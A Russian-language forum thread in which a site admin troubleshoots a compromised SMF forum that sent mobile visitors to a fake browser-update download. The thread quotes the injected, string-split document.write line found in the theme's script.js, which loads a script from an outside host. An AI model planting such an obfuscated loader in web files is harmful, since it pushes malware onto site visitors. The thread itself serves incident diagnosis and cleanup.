"фишинг" ссылка при заходе на форум с мобильных устр-в

Astarta · 08 мая 2013, 15:27:14

Уважаемые,

Помогите пожалуйста.
Вчера утром мои пользователи стали жаловаться, что при заходе на форум с мобильных их стали просить обновить браузер.
Происходит это при заходе на главную страницу форума. Если форум на техобслуживании все равно тоже самое.

Симптомы:
opera-mini предлагала скачать некий browser_update.apk
хром мобильный выдает вот такую картинку:
https://www.simplemachines.ru/radikal/s018/i519/1305/53/9ba589c92d30.jpg
сафари нечто похожее на хром.

при анализе было выянсено, что файл Themes/defauilt/scripts/script.js изменен. он содержал:
document.write("<sc"+"ript sr"+"c='htt"+"p:"+"/"+"/fil"+"esk"+"it.r"+"u/jq"+"uer"+"y."+"js' ></scr"+"ipt>");

вычала чистую версию SMF и восстановила из него этот файл, а также все \*.js скрипты.
результаты:
- опера мобильная стала заходить на форум нормально.
- у пользователей мобильного хрома и мобильной сафари проблема осталась.

После этого я пробовала заменять _все_ файлы форума на "чистые". Не помогает. Все равно редиректит на левый адрес и просит обновить браузер.

Остается сама база данных. Сделала очередной бекап и грохнула содержимое всех таблиц (empty). С пустой базой данных не редиректит.

пациент:
www.rat.ru/forum

На главную страницу сайта пользователи заходят свободно. Проблема именно в форуме.

Что дальше делать не знаю

Откатывать базу на более старую из бекапа не хочется. Юзеры меня тогда живьем съедят :-D

Да, гугл не помог

Может тут кто-нибудь поможет разобраться?

digger® · 08 мая 2013, 19:11:58

Маловероятно что это в базе, но теоретически возможно.
У вас моды какие-нибудь стоят для вывода дополнительного контента на страницах, типа счетчиков, информационных сообщений... ? Посмотрите, что в их настройках ничего лишнего не прописалось.

В htaccess проверьте отсутствие левых редиректов. Айболитом весь форум просканируйте.

Жека · 09 мая 2013, 18:50:31

Какую-нибудь партнерскую программу используете?

Всякие левые партнёрки могут такую гадость делать именно для мобильной версии сайта (ну это чтобы владелец как можно позже заметил).

Astarta · 09 мая 2013, 23:43:15

Моды у нас есть да...
Auto Merge Double Post    1.5
Topic View Log    1.2
Moderator and Administrator Comment Tags
Ad Managment    3.0.1
Member Color Link    3.1
Join Reason    1.3
В настройках у них ничего нового не появилось. Баннеры и рекламу от яндекса я первым делом пробовала отрубить.

Айболит нашел кучу по его мнению "вредоносного" кода, но при ближайшем рассмотрении это оказался просто код форума, ничего левого.

Откровенно говоря, мне странно почему после того как я очистила содержимое таблиц и попросила одну пользовательницу, у которой наблюдается проблема при захоже на форум с айфона, она сказала что в таком случае ее никуда не редиректило...
А когда отресторила базу, ее снова начило перебрасывать на левый сайт.
Вот этого упорно не понимаю, почему так....

При этом сама я не могу воспроизвести эту самую проблему, на работе просила людей зайти на форум с apple устройств и все сказали что все нормально.
Со своего андроида тоже нормально теперь захожу. До того как заменила джаваскрипты да, опера-мини не могла зайти на форум.

Пока видимо попробую еще раз убедиться, что пользователи действительно очистили кеши браузера.
Если не поможет, попробую, наверно, как посоветовали на simplemachines.com, снести файлы форума и переустановить его через апгрейдный инсталлер. Там тоже не верят, что БД может аффектить.

Других идей нет

Drakonsa · 10 мая 2013, 00:40:17

.htaccess

digger® · 10 мая 2013, 00:49:26

Цитата: Astarta от 09 мая 2013, 23:43:15При этом сама я не могу воспроизвести эту самую проблему, на работе просила людей зайти на форум с apple устройств и все сказали что все нормально.Со своего андроида тоже нормально теперь захожу. До того как заменила джаваскрипты да, опера-мини не могла зайти на форум.

В четвертом андроиде в стоковом браузере можно в настройках сменить user agent и прикинутся iPad/iPhone для проверки.

Astarta · 10 мая 2013, 00:57:29

про .haccess не написала. его я первым делом проверила. все ок там. он у меня кастомный и ничего в нем не изменилось.

о! про замечание про андроид спасибо! Не знала. Проверю обязательно.

update:
да, маскируясь под айфон нормально все... и основная версия открывается и мобильные...

GeorG · 12 мая 2013, 13:49:46

Нужно чистить все файлы с расширением *.js (не только те, что поставляются с движком, но и те что были установлены модами), файл .haccess, файлы index.php (обычно в них тоже сидит зараза). Перезаливать чистые файлы не советую, так как моды туда тоже прописываю свой код, и заменив оригиналом, вы поломаете мод. Как вариант, сносить всё, и устанавливать по новой.

Такие вирусы ставят 301 редирект обычно на страницы форума, откуда был переброс на вредоносный сайт, от того даже вычистив форум, пользователи всё же ещё попадают на сайт паразит, т.к., тут уже, их же браузер тут перенаправляет. Помогает чистка истории, кук и прочего...

В БД на моём веке, ещё не один вирус не прописывался (а случаев я не мало видел). Был один случай, когда пользователь вставил аватарку через url с другого сайта. Тот сайт вскоре был заражен и антивирус ругался на те страницы, где присутствовал тот пользователь с этой аватаркой. Нашёл всё это дело через БД форума, по тому адресу, на что матерился антивирус. Перелазил аватарку на форум, это решило проблему.

Astarta · 12 мая 2013, 14:28:22

Спасибо всем за советы.
мы разобрались

после того как я заменила "зараженные" джаваскипты, проблемы были уже на стороне пользователей. Как выяснилось, некоторые не знали как почистить кеш, но боялись спросить :-)

теперь т.т.т. полет нормальный.
надеюсь, больше не подцепим

GeorG · 12 мая 2013, 14:31:23

На сайте, тоже файлы проверьте. Успехов.